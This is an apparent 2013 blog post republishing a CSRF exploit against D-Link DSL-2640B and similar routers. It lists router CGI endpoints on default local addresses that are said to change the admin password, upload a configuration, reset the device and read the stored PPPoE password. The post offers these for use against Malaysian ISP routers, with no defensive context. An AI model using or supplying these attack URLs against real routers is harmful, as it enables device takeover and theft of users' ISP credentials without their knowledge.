D-Link DSL-2640B CSRF Exploit

D-Link DSL-2640B CSRF Exploit

# Author: Ryuzaki Lawlet
# Credit: The Black Devils
# Software Link: N/A
# Category : webapps
# Google dork: N/A
# Tested on: Ubuntu

Information
-------------------------------
./note/
This Exploit refer from  http://1337day.com/exploits/19482 author The Black Devils

All this exploit bypass[CSRF] to change password, config, reset router, & read pppoe password in all version dsl-2730U n above

-------------------------------
Change Password
http://192.168.1.1/password.cgi?sysuser=
http://192.168.0.1/password.cgi?sysuser=

-------------------------------

Upload config
http://192.168.1.1/upload.cgi
http://192.168.0.1/upload.cgi

------------------------------
reset router
http://192.168.1.1/resetrouter.cgi
http://192.168.0.1/resetrouter.cgi

-------------------------------

read pppoe password
http://192.168.1.1/pppoe.cgi
http://192.168.0.1/pppoe.cgi

-------------------------------

Work all Malaysian router unifi & Streamyx \m/ ...

Tweet

Postingan terkait:

• D-Link DSL-[2730U N ABOVE] CSRF Exploit
• DB108-WL DSL Router CSRF Get pppoe ID/Password
• Reversing Padpin Part 2
• Padpin.A - Trojan Horse
• Non-Persistent XSS at SecretRecipe
• Mozilla FireFox 23.0.1 - Denial of Service Vulnerability
• chip.co.id <== XSS
• OpenVBX - CSRF / XSS / Object Injection
• MSDN Lab Microsoft - Content Spoofing / Text Injection
• D-Link DSL-2640B CSRF Exploit

Ditulis Ryuzaki — Sunday, July 21, 2013 — Add Comment — CSRF, dlink, exploit, router